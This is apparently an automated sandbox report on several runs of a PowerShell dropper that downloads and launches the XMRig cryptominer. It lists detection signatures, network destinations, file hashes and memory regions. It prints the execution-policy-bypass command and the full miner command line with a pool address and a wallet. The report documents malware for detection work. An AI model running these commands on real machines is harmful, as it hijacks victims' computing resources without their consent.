N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 74.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 23.62.61.75:443 www.bing.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 75.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
NL 23.62.61.168:443 www.bing.com tcp
US 8.8.8.8:53 168.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/3052-0-0x00007FFFE3423000-0x00007FFFE3425000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bduobymj.urz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3052-10-0x000001F27E130000-0x000001F27E152000-memory.dmp

memory/3052-11-0x00007FFFE3420000-0x00007FFFE3EE1000-memory.dmp

memory/3052-12-0x00007FFFE3420000-0x00007FFFE3EE1000-memory.dmp

memory/3052-13-0x00007FFFE3423000-0x00007FFFE3425000-memory.dmp

memory/3052-14-0x00007FFFE3420000-0x00007FFFE3EE1000-memory.dmp

memory/3052-16-0x00007FFFE3420000-0x00007FFFE3EE1000-memory.dmp

memory/3052-17-0x000001F27E510000-0x000001F27E522000-memory.dmp

memory/3052-18-0x000001F27E160000-0x000001F27E16A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3696-49-0x00000255A9190000-0x00000255A91B0000-memory.dmp

memory/3696-50-0x00000255AAA90000-0x00000255AAAB0000-memory.dmp

memory/3696-51-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-52-0x00000255AAAB0000-0x00000255AAAD0000-memory.dmp

memory/3696-53-0x00000255AAAD0000-0x00000255AAAF0000-memory.dmp

memory/3696-54-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-55-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3052-56-0x00007FFFE3420000-0x00007FFFE3EE1000-memory.dmp

memory/3696-57-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-59-0x00000255AAAD0000-0x00000255AAAF0000-memory.dmp

memory/3696-58-0x00000255AAAB0000-0x00000255AAAD0000-memory.dmp

memory/3696-60-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-61-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-62-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-63-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-64-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-65-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-66-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-67-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-68-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-69-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-70-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-71-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-72-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-73-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-74-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-75-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-76-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-77-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-78-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-79-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-80-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-81-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-82-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-83-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-84-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-85-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-86-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-87-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-88-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-89-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-90-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-91-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-92-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-93-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-94-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-95-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-96-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-97-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-98-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-99-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-100-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-101-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-102-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-103-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-104-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-105-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-106-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-107-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-108-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-109-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-110-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-111-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-112-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-113-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-114-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-115-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-116-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-117-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

memory/3696-118-0x00007FF6F9EC0000-0x00007FF6FAAF3000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:11

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
NL 23.62.61.145:443 www.bing.com tcp
US 8.8.8.8:53 145.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 32.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 226.162.46.104.in-addr.arpa udp

Files

memory/2792-0-0x00007FFB552B3000-0x00007FFB552B5000-memory.dmp

memory/2792-10-0x00000251DCA00000-0x00000251DCA22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w2oo0nww.pbp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2792-11-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp

memory/2792-12-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp

memory/2792-14-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp

memory/2792-15-0x00000251DCE00000-0x00000251DCE12000-memory.dmp

memory/2792-16-0x00000251DCDE0000-0x00000251DCDEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3948-47-0x000001E680630000-0x000001E680650000-memory.dmp

memory/3948-48-0x000001E680680000-0x000001E6806A0000-memory.dmp

memory/3948-49-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-52-0x000001E6806A0000-0x000001E6806C0000-memory.dmp

memory/3948-50-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-51-0x000001E6806C0000-0x000001E6806E0000-memory.dmp

memory/2792-53-0x00007FFB552B3000-0x00007FFB552B5000-memory.dmp

memory/2792-54-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp

memory/3948-55-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-56-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-57-0x000001E6806C0000-0x000001E6806E0000-memory.dmp

memory/3948-58-0x000001E6806A0000-0x000001E6806C0000-memory.dmp

memory/3948-59-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-60-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-61-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-62-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-63-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-64-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-65-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-66-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-67-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-68-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-69-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-70-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-71-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-72-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-73-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-74-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-75-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-76-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-77-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-78-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-79-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-80-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-81-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-82-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-83-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-84-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-85-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-86-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-87-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-88-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-89-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-90-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-91-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-92-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-93-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-94-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-95-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-96-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-97-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-98-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-99-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-100-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-101-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-102-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-103-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-104-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-105-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-106-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-107-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-108-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-109-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-110-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-111-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-112-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-113-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-114-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-115-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-116-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

memory/3948-117-0x00007FF7FA370000-0x00007FF7FAFA3000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:53

Platform

win11-20240426-en

Max time kernel

1789s

Max time network

1792s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 79.239.69.13.in-addr.arpa udp

Files

memory/1868-0-0x00007FFC3FCC3000-0x00007FFC3FCC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mqsajev1.0d4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1868-9-0x00000201FA780000-0x00000201FA7A2000-memory.dmp

memory/1868-10-0x00007FFC3FCC0000-0x00007FFC40782000-memory.dmp

memory/1868-11-0x00007FFC3FCC0000-0x00007FFC40782000-memory.dmp

memory/1868-12-0x00007FFC3FCC0000-0x00007FFC40782000-memory.dmp

memory/1868-15-0x00000201FA810000-0x00000201FA81A000-memory.dmp

memory/1868-14-0x00000201FA820000-0x00000201FA832000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3004-46-0x000001F002BA0000-0x000001F002BC0000-memory.dmp

memory/3004-47-0x000001F002BE0000-0x000001F002C00000-memory.dmp

memory/3004-48-0x00007FF6522B0000-0x00007FF652EE3000-memory.dmp

memory/1868-49-0x00007FFC3FCC3000-0x00007FFC3FCC5000-memory.dmp

memory/1868-50-0x00007FFC3FCC0000-0x00007FFC40782000-memory.dmp

